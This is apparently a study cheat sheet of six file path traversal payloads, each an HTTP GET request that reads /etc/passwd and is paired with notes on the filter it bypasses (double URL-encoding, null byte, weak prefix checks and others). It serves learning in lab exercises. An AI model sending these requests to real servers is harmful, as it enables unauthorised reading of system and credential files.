##### File Path Traversal – Simple case
```http
GET /product?filename=../../../etc/passwd HTTP/1.1
```
**Context:** Filename passed as query parameter used to load local files
**Encoding:** None
**Source:** [[1. File path traversal, simple case]]
---
##### File Path Traversal – Absolute path used (traversal sequences blocked)
```http
GET /product?filename=/etc/passwd HTTP/1.1
```
**Context:** `filename` parameter used without traversal support, but allows absolute paths from server root
**Encoding:** None
**Source:** [[2. File path traversal, traversal sequences blocked with absolute path bypass]]
---
##### File Path Traversal – Traversal sequences stripped non-recursively
```http
GET /product?filename=....//....//....//etc/passwd HTTP/1.1
```
**Context:** Application strips `../` sequences but does not recursively sanitize malformed traversal patterns
**Encoding:** None
**Source:** [[3. File path traversal, traversal sequences stripped non-recursively]]
---
##### File Path Traversal – Traversal sequences stripped with superfluous URL-decode
```http
GET /product?filename=..%252f..%252f..%252fetc/passwd HTTP/1.1
```
**Context:** Application filters traversal patterns before decoding input, allowing double-encoded traversal to bypass filters
**Encoding:** Double URL-encoded (`%252f` → decoded to `%2f` → `/`)
**Source:** [[4. File path traversal, traversal sequences stripped with superfluous URL-decode]]
---
##### File Path Traversal – Weak prefix validation bypass
```http
GET /image?filename=/var/www/images/../../../etc/passwd HTTP/1.1
```
**Context:** Application checks that `filename` **starts with** `/var/www/images/`, but does not normalize the path before access
**Encoding:** None
**Source:** [[5. File path traversal, validation of start of path]]
---
##### File Path Traversal – File extension validation bypass via null byte injection
```http
GET /product?filename=../../../etc/passwd%00.png HTTP/1.1
Host: vulnerable-website.com
```
**Context:** Application enforces that `filename` ends in `.png`, but uses null byte–vulnerable string handling
**Encoding:** Null byte encoded as `%00`
**Source:** [[6. File path traversal, validation of file extension with null byte bypass]]